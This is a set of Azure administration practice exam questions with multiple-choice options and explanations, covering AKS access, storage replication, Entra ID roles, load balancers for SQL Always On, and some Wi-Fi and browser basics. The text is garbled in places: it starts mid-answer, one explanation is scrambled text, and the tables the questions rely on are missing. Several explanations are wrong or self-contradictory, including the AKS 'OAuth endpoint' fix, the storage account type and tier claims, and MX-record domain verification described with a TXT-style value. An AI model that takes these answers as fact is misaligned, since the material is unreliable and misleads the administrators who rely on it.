Recreate AKS1
From contoso.com, modify the Organization relationships settings
The administrator is unable to grant access to the Azure Kubernetes Service (AKS) cluster named AKS1 to users in contoso.com (Azure AD tenant). This issue typically occurs because AKS integrates with Azure AD for authentication, and an OAuth 2.0 authorization endpoint is required for Azure AD to handle authentication requests. Why Creating an OAuth 2.0 Authorization Endpoint is the Solution: AKS Uses Azure AD for Authentication: AKS can integrate with Azure AD to allow role-based access control (RBAC). Users in contoso.com need to authenticate using Azure AD before accessing AKS. OAuth 2.0 Authorization Endpoint Enables Authentication: The OAuth 2.0 authorization endpoint allows AKS to redirect users to Azure AD for login. Without this, AKS cannot authenticate users, preventing access control. How to Create the Authorization Endpoint in Azure AD: Navigate to Azure Portal ? Microsoft Entra ID (Azure AD) ? App registrations. Register an application for AKS authentication. Azure AD will generate an OAuth 2.0 authorization endpoint in this format: https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/authorize This endpoint will be used to authenticate users before granting access to AKS1.
You are creating an Azure virtual machine that will run Windows Server. As an Azure admin, you must ensure that VM1 will be part of a virtual machine scale set. Which setting should you configure during the creation of the virtual machine?
Availability options
Azure Spot instance
Management
Region
When creating an Azure Virtual Machine (VM) that will be part of a Virtual Machine Scale Set (VMSS), you need to configure the Availability options setting. Azure provides different availability configurations, including: No infrastructure redundancy required. The VM is not part of any high-availability setup. Availability set: Ensures VMs are distributed across multiple faults and updates domains for redundancy. Virtual machine scale set: Ensures the VM is part of a scale set, allowing Azure to scale instances based on demand automatically. Since you specifically want VM1 to be part of a virtual machine scale set, you must choose the virtual machine scale set option under Availability options during VM creation. This ensures that the VM is deployed within a scale set, enabling automatic scaling, load balancing, and high availability. Why not the other options? (b) Azure Spot instance: This setting is used for cost-saving purposes by running the VM on unused Azure capacity but does not configure a scale set. (c) Management: This setting allows enabling monitoring, backup, and auto-shutdown but does not control scale-set membership. (d) Region: Determines where the VM is deployed but does not configure its availability settings. Thus, to make sure VM1 is part of a Virtual Machine Scale Set, the Availability options setting must be configured correctly. 4o
You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 by using the Azure backbone. What should you configure?
VPN gateway
Peering
a service endpoint
a routing table
Azure Virtual Network (VNet) Service Endpoints allow virtual machines (VMs) in a VNet to securely access Azure services, such as Azure Storage, over the Azure backbone network instead of routing traffic over the public internet. By enabling a service endpoint for Azure Storage on the subnet where VM1 is located, the network traffic between VM1 and storage1 remains within Azure’s private network. This improves security, reduces latency, and provides better reliability. Why not the other options? (a) VPN Gateway – A VPN gateway connects on-premises networks to Azure over the public internet, not needed for communication between an Azure VM and an Azure storage account. (b) Peering – Virtual network peering connects two VNets, but it does not provide direct access to Azure Storage over the Azure backbone. (d) Routing Table – A routing table controls how traffic flows within a network but does not enable private access to Azure services.
Your office is located in a building with a number of other companies. How should you configure the wireless network to prevent casual users in the building from seeing your network name easily?
Enable WPA3.
Disable SSID broadcasts.
Reduce radio power levels.
Enable MAC filtering.
The SSID (Service Set Identifier) is the name of your wireless network. By disabling SSID broadcasts, you prevent your network name from appearing in the list of available Wi-Fi networks that people see when scanning nearby connections. This can help deter casual or opportunistic users from trying to connect, though it is not a strong security measure by itself, as the SSID can still be detected with network sniffing tools. Why the other options are not correct for this specific purpose: Enable WPA3: This improves security for users who connect, but doesn’t hide the network name. Reduce radio power levels: This limits range, which might reduce visibility, but doesn’t make the network invisible and can impact legitimate access. Enable MAC filtering: This restricts which devices can connect, but again, does not hide the SSID. So, to make your network less visible, disabling SSID broadcast is the most direct and relevant step.
You have an Azure subscription that contains 100 virtual machines. You regularly create and delete virtual machines. You need to identify unattached disks that can be deleted. What should you do?
From Azure Cost Management, view Cost Analysis
From Azure Advisor, modify the Advisor configuration
From Microsoft Azure Storage Explorer, view the Account Management properties
From Azure Cost Management, view Advisor Recommendations
Azure provides Advisor Recommendations as part of Azure Cost Management, which helps identify unused or underutilized resources, including unattached disks. When you create and delete virtual machines (VMs) frequently, their managed disks may not be automatically deleted when a VM is removed. These orphaned disks continue to incur costs, even though they are not attached to any active VM. By navigating to Azure Cost Management > Advisor Recommendations, you can: Identify unused managed disks that are no longer attached to any VM. Get recommendations to delete or move these disks to save costs. Optimize your Azure storage usage. Why not the other options? (a) From Azure Cost Management, view Cost Analysis Cost Analysis provides spending insights but does not specifically identify unattached disks. (b) From Azure Advisor, modify the Advisor configuration Modifying Advisor settings lets you customize recommendations but does not directly show unattached disks. (c) From Microsoft Azure Storage Explorer, view the Account Management properties Storage Explorer is useful for managing storage accounts but does not automatically identify unused disks.
You have an Azure subscription that contains a virtual machine named VM1. VM1 requires volume encryption for the operating system and data disks. You create an Azure key vault named vault1. You need to configure vault1 to support Azure Disk Encryption for volume encryption. Which setting should you modify for vault1?
Keys
Secrets
Access policies
Security
Azure Disk Encryption (ADE) uses Azure Key Vault to store encryption keys and secrets. To allow VM1 to use vault1 for volume encryption, the Key Vault access policies must be configured to grant Azure Disk Encryption permissions. When you configure Access policies in vault1, you need to: Assign the correct permissions to allow the VM to access encryption keys and secrets. Grant the necessary roles (such as “Key Vault Crypto Service Encryption User”) to the Azure Disk Encryption service. Ensure that VM1 or the service principal it uses has the correct read and write access to encryption keys. Why not the other options? (a) Keys – This stores encryption keys, but modifying keys alone does not grant the required permissions to enable disk encryption. (b) Secrets – Secrets store credentials, but Azure Disk Encryption requires access policy settings, not just secrets. (d) Security – This setting includes general security configurations like firewalls and access control, but it does not specifically enable disk encryption.
You have an Azure subscription that contains several hundred virtual machines. You need to identify which virtual machines are underutilized. What should you use?
Azure Advisor
Azure Monitor
Azure Policies
Azure recommendations
Advisor is a Belek TE ERE GEdelps you follow best practices to optimize your Azure deployments. It analyzes your resource configuration and usage telemetry and then recommends solutions that can help you improve the cost effectiveness, performance, reliability, and security of your Azure resources. With Advisor, you can: « Get proactive, actionable, and personalized best practices recommendations. <
You have a Microsoft Entra ID tenant named contoso.com. You need to ensure that a user named User1 can review all the settings of the tenant. User1 must be prevented from changing any settings. Which role should you assign to User1?
Directory reade
Security reader
Reports reader
Global reader
The Global Reader role in Microsoft Entra ID (formerly Azure AD) allows a user to view all settings and administrative information in the tenant without making any changes. Since you need User1 to review all tenant settings but prevent them from modifying anything, the Global Reader role is the best fit. Why Global Reader? Read-only access to all administrative settings in Microsoft Entra ID. Can view security policies, user properties, groups, and configurations without the ability to edit them. Suitable for auditors, compliance officers, or administrators who need oversight but no modification rights. Why not the other options? ? (a) Directory Reader Can view user, group, and directory information but not all settings of the tenant. Does not provide access to security, policy, or admin settings. ? (b) Security Reader Can view security-related information such as reports, alerts, and security configurations. Does not provide access to all tenant settings. ? (c) Reports Reader Can view usage and analytics reports for Entra ID and Microsoft 365. Cannot review tenant settings.
You have a Microsoft Entra ID tenant named contoso.com. You deploy a development Entra ID tenant, and then you create several custom administrative roles in the development tenant. You need to copy the roles to the production tenant. What should you do first?
From the development tenant, export the custom roles to JSON
From the production tenant, create a new custom role.
From the development tenant, perform a backup.
From the production tenant, create an administrative unit
Microsoft Entra ID allows you to create custom administrative roles in one tenant and reuse them in another tenant (such as a production environment). Since you need to copy the custom roles from the development tenant to the production tenant, you must first export them to a JSON file. This process involves: Exporting the custom roles from the development tenant in JSON format using Microsoft Graph API or PowerShell. Importing the JSON file into the production tenant to recreate the roles. This method ensures that all role permissions and configurations remain consistent across tenants. Why not the other options? ? (b) From the production tenant, create a new custom role. This would require manually recreating each role from scratch, which is inefficient and prone to errors. Instead, exporting and importing JSON ensures exact replication. ? (c) From the development tenant, perform a backup. Backing up the tenant does not provide a way to export and transfer specific custom roles to another tenant. ? (d) From the production tenant, create an administrative unit. Administrative units are used for scoping role assignments within a tenant but do not help copy custom roles between tenants.
Your company has a Microsoft Entra ID subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of network interfaces needed for this configuration?
5
10
20
25
Each Azure Virtual Machine (VM) requires at least one network interface (NIC) to connect to a Virtual Network (VNet). In this scenario, each VM needs: A private IP address (for internal communication within the VNet). A public IP address (for external internet access). However, Azure allows a single NIC to have both a private and a public IP address. This means that each VM can have: One NIC One private IP One public IP Since you need 5 VMs, and each VM requires only one NIC to support both IPs, the minimum number of NICs needed is 5. Why not the other options? ? (b) 10 – This would mean assigning two NICs per VM, which is unnecessary since a single NIC can support both public and private IPs. ? (c) 20 – This would require four NICs per VM, which is excessive and not required in this scenario. ? (d) 25 – This would mean five NICs per VM, which is far more than needed.
Your company has a Microsoft Entra ID subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of security groups needed for this configuration?
1
5
7
10
In Azure, Network Security Groups (NSGs) are used to control inbound and outbound traffic for virtual machines (VMs) by defining security rules. Since all five VMs require identical security rules, you can use a single NSG and associate it with the subnet or NICs of the VMs. Why only 1 NSG? NSGs can be applied at the subnet level in a Virtual Network (VNet). If you associate one NSG with the subnet, all five VMs in the subnet inherit the same security rules. This ensures consistent security policies for all VMs without needing multiple NSGs. Why not the other options? ? (b) 5 – This would mean one NSG per VM, which is unnecessary because a single NSG applied at the subnet level can cover all VMs. ? (c) 7 – No scenario justifies using seven NSGs, as all VMs require identical rules. ? (d) 10 – This would mean two NSGs per VM, which is excessive and redundant.
You have an Azure subscription that contains several Azure runbooks. The runbooks run nightly and generate reports. The runbooks are configured to store authentication credentials as variables. You need to replace the authentication solution with a more secure solution. What should you use?
Azure Active Directory (Azure AD) Identity Protection
Azure Key Vault
an access policy
an administrative unit
Azure Key Vault is a secure storage solution for secrets, certificates, and encryption keys in Azure. Since the runbooks are currently storing authentication credentials as variables, this method is not secure because: Variables are stored in plain text, which makes them vulnerable to unauthorized access. If an attacker gains access to the runbook, they can extract credentials. By using Azure Key Vault, you can: Securely store authentication credentials instead of keeping them as variables. Restrict access using role-based access control (RBAC) and managed identities. Automatically retrieve credentials when needed without exposing them in the runbook. This ensures that authentication credentials remain secure while allowing runbooks to function normally. Why not the other options? ? (a) Azure Active Directory (Azure AD) Identity Protection Identity Protection detects and prevents identity-related security risks (e.g., detecting compromised accounts) but does not store secrets securely. ? (c) An access policy Access policies define permissions for resources like Key Vault, but they do not store credentials. You need a secure storage solution (Key Vault) first, and then you can configure access policies for it. ? (d) An administrative unit Administrative units are used to scope Entra ID (Azure AD) role assignments, but they do not manage authentication credentials.
You administer a solution in Azure that is currently having performance issues. You need to find the cause of the performance issues about metrics on the Azure infrastructure. Which of the following is the tool you should use?
Azure Traffic Analytics
Azure Monitor
Azure Activity Log
Azure Advisor
Azure Monitor is the primary tool for collecting, analyzing, and visualizing metrics and logs related to Azure infrastructure and performance. Since you need to investigate performance issues, Azure Monitor provides: Metrics tracking (CPU, memory, disk, and network usage). Real-time monitoring to identify resource bottlenecks. Alerts and diagnostics to troubleshoot issues efficiently. Azure Monitor gathers data from Azure resources, applications, and virtual machines and helps detect performance degradation in services. Why not the other options? ? (a) Azure Traffic Analytics Traffic Analytics focuses on network traffic flow analysis, but it does not provide general performance metrics for Azure resources. ? (c) Azure Activity Log Activity Log records management operations (such as VM start/stop events), but does not track performance metrics. ? (d) Azure Advisor Azure Advisor provides best-practice recommendations for cost, security, and performance, but it does not offer real-time performance monitoring like Azure Monitor.
Google Chrome occasionally displays a pop-up window in front of your browser when you visit websites. Typically, it’s an advertisement aiming to persuade you to buy something. What should you do to prevent this from occurring?
Install an antivirus program.
Install an anti-malware program.
Enable Chrome’s pop-up blocker.
Enable Windows Firewall.
To prevent pop-up ads from appearing in Google Chrome, you should enable Chrome’s built-in pop-up blocker. Here’s why this is the best solution: Pop-up blocker: Google Chrome has an integrated pop-up blocker that is designed to stop unwanted pop-up windows (like advertisements) from appearing while you browse. This is the most direct and effective solution to control pop-up ads. Customization: The pop-up blocker in Chrome can be configured to block pop-ups for all sites or just specific sites. By default, Chrome blocks pop-ups from sites that are not on the allowed list. Why the other options are incorrect: Install an antivirus program: Antivirus software helps protect your system from viruses and malware, but it does not specifically target or block pop-up ads from websites. Pop-up blockers in browsers are better suited for this task. Install an anti-malware program: Similar to antivirus software, anti-malware programs can protect against malicious software but do not typically block pop-ups, which are often not malware-related. A pop-up blocker is a more direct solution. Enable Windows Firewall: Windows Firewall protects your system from unauthorized incoming and outgoing network traffic, but it does not block pop-ups within web browsers. The firewall is designed for network security, not for controlling web content like pop-ups. Conclusion: The best solution to prevent pop-ups in Google Chrome is to enable Chrome’s pop-up blocker. This feature specifically addresses unwanted pop-ups and ads while you are browsing.
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as a listener for the availability group. Solution: You create an HTTP health probe on port 1433. Does the solution meet the goal?
Yes
No
An Azure Internal Load Balancer (ILB) is used as a listener for an SQL Server Always On availability group to direct traffic to the active primary node. However, the solution fails because: The health probe must use port 59999 (or a custom probe port specified in SQL Server) instead of port 1433. Port 1433 is used for client connections to SQL Server, not for health probes. The health probe should check the availability of the primary replica by targeting the SQL Server listener probe port (typically 59999) rather than using HTTP. Correct Approach: To properly configure the Internal Load Balancer (ILB) listener, you should: ? Create a TCP health probe on the availability group’s probe port (e.g., 59999). ? Ensure the SQL Server instances are correctly configured to respond to the probe requests. ? Associate the health probe with the backend pool of the load balancer. Why the solution does NOT meet the goal? 1?? HTTP probes are not used for SQL Always On availability groups—a TCP probe is required. 2?? Port 1433 is for SQL client connections, not for health monitoring. 3?? The correct port for SQL Always On health probes is typically 59999 (or a custom port set in SQL Server).
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as the listener for the availability group. Solution: You set Session persistence to Client IP. Does the solution meet the goal?
Yes
No
An Azure Internal Load Balancer (ILB) is used as a listener for an SQL Server Always On availability group to direct traffic to the primary replica. However, setting Session Persistence to “Client IP” does NOT meet the goal because: SQL Server Always On requires a TCP health probe to detect the primary replica, but session persistence settings do not affect failover behavior. The ILB must correctly redirect traffic to the active primary replica based on the health probe status, not client IP persistence. Session persistence (Client IP) only ensures that a client’s connection goes to the same backend server, but this does not help with SQL Always On failover scenarios. Correct Approach: To properly configure the Internal Load Balancer (ILB) listener, you should: ? Use a TCP health probe on the availability group’s probe port (typically 59999). ? Configure the ILB with a backend pool containing the SQL Server VMs. ? Ensure the SQL Server instances respond to the health probe for correct failover handling. ? Set “Floating IP (Direct Server Return)” to Enabled for proper routing. Why the solution does NOT meet the goal? 1?? Session persistence (Client IP) does not help with SQL Always On failover—the ILB must dynamically route traffic to the active primary replica based on health probes. 2?? The ILB requires a TCP health probe to determine which SQL instance is currently active. 3?? Session persistence settings do not affect SQL Always On functionality, as connections must always be routed to the active primary, not a fixed VM.
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as a listener for the availability group. Solution: You enable Floating IP. Does the solution meet the goal?
Yes
No
When configuring an Azure Internal Load Balancer (ILB) as a listener for a Microsoft SQL Server Always On availability group, enabling Floating IP is required for proper failover handling. Why is Floating IP needed? Floating IP (Direct Server Return) ensures traffic is directed to the active primary replica of the Always On availability group. Without Floating IP, the ILB would not correctly route client connections after a failover. This setting allows the same frontend IP to be used across multiple SQL Server VMs without interruption. Correct Configuration Steps: To properly configure the ILB as a listener for SQL Always On, you should: ? Enable Floating IP on the ILB rule for the availability group listener. ? Use a TCP health probe on the availability group’s probe port (typically 59999). ? Associate the ILB with a backend pool containing the SQL Server VMs. ? Ensure SQL Server instances are correctly configured to respond to health probe requests. Why does this solution meet the goal? 1?? SQL Server Always On requires Floating IP to properly route traffic to the active primary replica. 2?? Without Floating IP, failover handling would not work correctly, causing connection disruptions. 3?? Floating IP allows seamless redirection of traffic, ensuring clients always connect to the active primary instance.
You plan to create an Azure Storage account in the Azure region of East US 2. You need to create a storage account that meets the following requirements: + Replicates synchronously. + Remains available if a single data center in the region fails. How should you configure the storage account? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Replication :
Geo-redundant storage (GRS)
Locally-redundant storage (LRS)
Read access Geo-redundant storage (RA-GRS)
Zone-redundant storage (ZRS)
When choosing an Azure Storage account replication type, the key requirements to meet are: 1?? Replicates synchronously ? This means that data must be instantly copied to multiple locations without delay. 2?? Remains available if a single data center fails ? This means that data must be distributed across multiple data centers within the same Azure region. Why is ZRS the correct choice? Zone-Redundant Storage (ZRS) synchronously replicates data across multiple availability zones within the same Azure region. If one data center (availability zone) fails, the storage remains available from the other zones. ZRS meets both requirements: synchronous replication and data center failure resilience. Why not the other options? ? Geo-Redundant Storage (GRS) Replication is asynchronous (not instant). Data is replicated to a secondary region, but there is no immediate failover if the primary region has an issue. Does not guarantee availability if a single data center fails. ? Locally-Redundant Storage (LRS) Replicates data only within a single data center. If the data center fails, all data is lost. Does not provide high availability. ? Read-Access Geo-Redundant Storage (RA-GRS) Same as GRS, but allows read access to the secondary region. Replication is still asynchronous, and failover is not automatic.
You plan to create an Azure Storage account in the Azure region of East US 2. You need to create a storage account that meets the following requirements: + Replicates synchronously. + Remains available if a single data center in the region fails. How should you configure the storage account? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Account type:
Blob Storage
Storage (general purpose v1)
StorageV2 (general purpose v2)
When selecting an Azure Storage account type, we need to ensure it meets the following requirements: 1?? Replicates synchronously ? Data must be copied instantly across multiple locations. 2?? Remains available if a single data center fails ? This means the storage must support Zone-Redundant Storage (ZRS), which distributes data across multiple availability zones within the same region. Why is StorageV2 (general purpose v2) the correct choice? StorageV2 supports ZRS, which ensures synchronous replication across multiple availability zones. StorageV2 is the latest and recommended storage type, offering enhanced performance, security, and cost-efficiency. Supports all storage services (Blobs, Files, Queues, and Tables). Why not the other options? ? Blob Storage Only supports blob data (not all storage services). Does not support ZRS for all access tiers, meaning it may not meet the high availability requirement. ? Storage (general purpose v1) Older version, lacking ZRS support and some advanced features. Less efficient in terms of performance and cost compared to StorageV2.
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage accounts can be switched to geo-redundant storage (GRS). Which storage accounts should you identify?
storage1 only
storage2 only
storage3 only
storage4 only
storage1 and storage4 only
storage2 and storage3 only
To switch a storage account to Geo-Redundant Storage (GRS), it must meet the following requirements: 1?? Must use Locally-Redundant Storage (LRS) as the current replication type. LRS ? GRS upgrade is possible. ZRS ? GRS upgrade is NOT possible. 2?? Must be a supported storage account type (not all storage types support GRS). Blob Storage and StorageV2 support GRS. File Storage (Premium) does NOT support GRS. Why is Storage2 the only correct answer? ? Storage2 meets both conditions: Uses LRS (which can be upgraded to GRS). Uses Blob Storage, which supports GRS. ? Storage1 & Storage3 use ZRS, which cannot be changed to GRS. ? Storage4 uses Premium LRS, which does not support GRS.
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage account can be converted to zone-redundant storage (ZRS) replication by requesting a live migration from Azure support. Which storage accounts should you identify?
storage1 only
storage2 only
storage3 only
storage4 only
To be eligible for live migration to Zone-Redundant Storage (ZRS), a storage account must meet these conditions: 1?? Must currently use Locally-Redundant Storage (LRS) Azure allows LRS ? ZRS migration via a support request. Geo-Redundant Storage (GRS) cannot be directly converted to ZRS. 2?? Must be a supported storage account type StorageV2 (general purpose v2) supports ZRS migration. Blob Storage and Storage (general purpose v1) do not support live migration to ZRS. Why is Storage2 the only correct answer? ? Storage2 meets both conditions: It currently uses LRS, which can be converted to ZRS via Azure support. It is a StorageV2 account, which supports ZRS. ? Storage1 & Storage3 use GRS/RA-GRS, which cannot be converted directly to ZRS. ? Storage4 is a Blob Storage account, which does not support ZRS migration.
You have an Azure subscription that contains the storage accounts shown in the following table. You need to identify which storage accounts support moving data to the Archive access tier. Which storage accounts should you use?
storage 1 only
storage2 only
storage3 only
storage4 only
To move data to the Archive access tier, a storage account must meet the following conditions: 1?? Must be either StorageV2 (general purpose v2) or Blob Storage StorageV1 does not support the Archive tier. 2?? Must support blob storage access tiers (Hot, Cool, and Archive) Only Blob Storage and StorageV2 accounts allow data to be moved to the Archive tier. 3?? Replication type does NOT impact Archive tier availability Archive tier can be used with LRS, ZRS, GRS, and RA-GRS storage accounts. Why is Storage4 the only correct answer? ? Storage4 meets both conditions: It is a Blob Storage account, which supports the Archive access tier. It uses RA-GRS, which does not prevent Archive tier usage. ? Storage1 & Storage3 are StorageV1 accounts, which do not support the Archive tier. ? Storage2 uses ZRS, which does not support the Archive tier.
You have an Azure subscription that contains the storage accounts shown in the following table. You plan to manage the data stored in the accounts by using lifecycle management rules. To which storage accounts can you apply lifecycle management rules?
storage1 only
storage1 and storage2 only
storage3 and storage4 only
storage1, storage2, and storage3 only
storage1, storage2, storage3, and storage4
Lifecycle management rules in Azure allow automated movement of data between storage tiers (Hot, Cool, and Archive) or deletion of old data. For lifecycle management to be applicable, a storage account must meet these conditions: 1?? Storage account must be one of the following types: StorageV2 (general purpose v2) ? (Supports lifecycle rules) Blob Storage ? (Supports lifecycle rules) Block Blob Storage ? (Supports lifecycle rules) StorageV1 (general purpose v1) does NOT support lifecycle rules ? 2?? Performance tier must be Standard: Premium storage accounts do NOT support lifecycle rules ? Why is Storage1, Storage2, and Storage3 the correct answer? ? Storage1 (StorageV2 + Standard) supports lifecycle rules. ? Storage2 (Blob Storage + Standard) supports lifecycle rules. ? Storage3 (Block Blob Storage + Premium) supports lifecycle rules (for block blobs only). ? Storage4 (StorageV1 + Premium) does NOT support lifecycle rules.
While making configuration changes to your SOHO router, you discover that WPA3 is not available. What should you do?
Update the router’s firmware.
Configure content filtering.
Configure port forwarding.
Update the SSID.
If WPA3 is not available in your SOHO (Small Office/Home Office) router’s wireless security settings, the most likely reason is that your router’s firmware is outdated. WPA3 is a newer wireless security protocol, and firmware updates often include support for newer standards like WPA3, along with performance improvements and security patches. Why the other options are incorrect: Configure content filtering: This controls what websites or services can be accessed but does not affect available wireless security protocols. Configure port forwarding: This allows external devices to access services inside the network, unrelated to Wi-Fi security settings. Update the SSID: The SSID is the name of the wireless network. Changing it doesn’t enable WPA3 or impact encryption protocols. Summary: Updating the firmware is the correct and necessary step to enable newer features like WPA3, provided your router hardware supports it.
You have an Azure subscription that contains Microsoft Entra ID tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1. An administrator reports that she is unable to grant access to AKST to the users in contoso.com. You need to ensure that access to AKST can be granted to the contoso.com users. What should you do first?
From contoso.com, modify the Organization relationships settings.
From contoso.com, create an OAuth 2.0 authorization endpoint.
Recreate AKS1
From AKST, create a namespace.
Azure Kubernetes Service (AKS) relies on Microsoft Entra ID (formerly Azure AD) for authentication and access control. If an administrator is unable to grant access to users from contoso.com, it likely means that AKS is not properly integrated with Entra ID for authentication. To fix this issue, you need to enable Entra ID authentication by configuring an OAuth 2.0 authorization endpoint in Entra ID. This allows AKS to use Entra ID-based RBAC (Role-Based Access Control) for authentication. Why is an OAuth 2.0 Authorization Endpoint Required? ? OAuth 2.0 is the industry standard for authentication and authorization. ? AKS requires Microsoft Entra ID integration to authenticate users. ? Without configuring the OAuth 2.0 authorization endpoint, AKS cannot validate access requests from Entra ID users. Steps to Configure Microsoft Entra ID Authentication for AKS 1?? Register AKS in Microsoft Entra ID: Go to Microsoft Entra ID > App registrations > New registration. Register a new application for AKS authentication. 2?? Create an OAuth 2.0 Authorization Endpoint: In Microsoft Entra ID, go to Endpoints. Copy the OAuth 2.0 token endpoint and configure it in AKS. 3?? Enable Entra ID-based authentication in AKS: Use the following Azure CLI command to integrate Entra ID with AKS: az aks update -g MyResourceGroup -n AKS1 –enable-aad Assign RBAC roles to users using Kubectl or Azure CLI. Why Not the Other Options? ? (A) Modify the Organization Relationships Settings This setting is used for B2B/B2C collaboration and cross-tenant access, not for granting Entra ID users access to AKS. ? (C) Recreate AKS1 Recreating AKS is not necessary. The issue is with authentication settings, not the cluster itself. ? (D) Create a Namespace in AKS
You have a resource group named RG1 that contains several unused resources. You need to use the Azure CLI to remove RG1 and all its resources, without requiring a confirmation. Which command should you use?
az group delete–name rg1 -no-wait -yes
az group deployment delete -name rg1 -no-wait
az group update-name rg1-remove
az group update -name rg1 -remove
The az group delete command is used to delete a resource group and all its associated resources in Azure. –name RG1 ? Specifies the name of the resource group to be deleted (RG1). –no-wait ? Ensures the command runs asynchronously, meaning it does not block the terminal while deleting. –yes ? Skips confirmation prompts, ensuring the deletion happens without manual intervention. This combination permanently removes RG1 and all the resources inside it without requiring user confirmation. Why Not the Other Options? ? (B) az group deployment delete –name RG1 –no-wait This command only deletes a deployment from the resource group, not the resource group itself. The resource group and its resources will still exist. ? (C) az group update –name RG1 –remove az group update is used to modify a resource group’s properties, not delete it. –remove does not delete the entire resource group, but only specific properties. ? (D) az group wait –deleted –resource-group RG1 az group wait is used to wait until a resource group is deleted, but it does not delete the resource group itself. This command would only make sense after running az group delete.
You have an Azure subscription named Subscription. Subscription] contains the resource groups in the following table. R61 has a web app named WebApp1. WebAppT is located in West Europe. You move WebApp to RG2. What is the effect of the move?
The App Service plan for WebApp1 remains in West Europe. Policy2 applies to WebApp1
The App Service plan for WebApp1 remains in West Europe. Policy2 applies to WebApp1
The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1.
The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1.
When you move WebApp1 from RG1 (West Europe) to RG2 (North Europe), the following effects occur: The Web App’s physical location does not change WebApp1 is hosted on an App Service Plan, which determines its region. Moving WebApp1 to a different resource group does not change its App Service Plan’s region. Since the App Service Plan is in West Europe, WebApp1 will continue to run in West Europe. The resource group policies are applied based on the new group Each resource group has its own policies that affect the resources within it. When WebApp1 moves to RG2, it will now inherit the policies of RG2 (which is Policy2). Why Not the Other Options? ? (B) The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1. Incorrect: The App Service Plan does not move when transferring a web app between resource groups. Correct: Only the Web App moves, but it remains in the same region. ? (C) The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1. Incorrect: Policy1 belongs to RG1, but WebApp1 is now in RG2. Correct: WebApp1 now follows Policy2 from RG2. ? (D) The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1. Incorrect: The App Service Plan stays in West Europe, and WebApp1 inherits Policy2 (not Policy1).
You have a Microsoft Entra tenant named contoso.com. You collaborate with an external partner named thetechblackboard.com. You plan to invite users in the techblackboard.com to the contoso.com tenant. You need to ensure that invitations can be sent only to thetechblackboard.com users. What should you do in the Microsoft Entra admin center?
From Cross-tenant access settings, configure the Tenant restrictions settings.
From Cross-tenant access settings, configure the Microsoft cloud settings.
From External collaboration settings, configure the Guest user access restrictions settings.
From External collaboration settings, configure the Collaboration restrictions settings.
When collaborating with an external partner (thetechblackboard.com), you need to restrict guest invitations only to users from that domain. This is done by configuring Collaboration restrictions in the External collaboration settings. External collaboration settings allow control over how external users can be invited and what permissions they have. Collaboration restrictions let you define allowed or blocked domains for guest invitations. To only allow users from thetechblackboard.com, you can: Add “thetechblackboard.com” to the allowed domains list Block all other domains from receiving invitations This ensures that invitations can only be sent to users from thetechblackboard.com. Why Not the Other Options? ? (A) From Cross-tenant access settings, configure the Tenant restrictions settings. Incorrect because Tenant Restrictions control which tenants your users can access, not who can be invited as guests. Correct Use Case: Restricting your users from accessing external Microsoft Entra tenants. ? (B) From Cross-tenant access settings, configure the Microsoft cloud settings. Incorrect because Microsoft cloud settings manage how different Microsoft cloud services (e.g., Office 365, Azure AD B2B) interact across tenants, not guest invitations. ? (C) From External collaboration settings, configure the Guest user access restrictions settings. Incorrect because Guest User Access Restrictions control guest permissions once invited but do not restrict which domains can receive invitations. Correct Use Case: Limiting what invited guests can do inside your tenant (e.g., read-only access).
Your company has a Microsoft Entra ID tenant named thetechblackboard.onmicrosoft.com and a public DNS zone for thetechblackboard.com. You added the custom domain name thetechblackboard.com to Microsoft Entra ID. You need to verify that Azure can verify the domain name. What DNS record type should you use?
A
CNAME
SOA
MX
When adding a custom domain name (e.g., thetechblackboard.com) to Microsoft Entra ID, Azure requires domain verification to ensure ownership. This is done by adding a DNS record in the public DNS zone (thetechblackboard.com). Azure provides two options for verification: MX (Mail Exchanger) Record TXT (Text) Record The MX record is commonly used because: It is required for email services, making it a widely recognized method of verification. It does not interfere with existing email configurations if it has a priority of 0 and no mail server specified. When setting up the custom domain in Microsoft Entra ID, Microsoft provides an MX record like: Priority: 0 Host: @ Mail Server: MS=ms######## TTL: 3600 (or default) Once this record is added and propagated, Azure verifies the domain automatically. Why Not the Other Options? ? (A) A (Address) Record Incorrect because A records are used to map a domain to an IP address, typically for websites or servers. Microsoft does not use A records for domain verification in Entra ID. ? (B) CNAME (Canonical Name) Record Incorrect because CNAME records alias one domain to another (e.g., www.thetechblackboard.com ? thetechblackboard.com). Microsoft Entra ID does not use CNAME for domain verification. ? (C) SOA (Start of Authority) Record Incorrect because SOA records store adminis
You sign up for Microsoft Entra ID P2. You need to add a user named admin @contoso.com as an administrator on all the computers that will be joined to the Entra domain. What should you configure in Microsoft Entra ID?
Device settings from the Devices blade
Providers from the MFA Server blade
User settings from the Users blade
General settings from the Groups blade
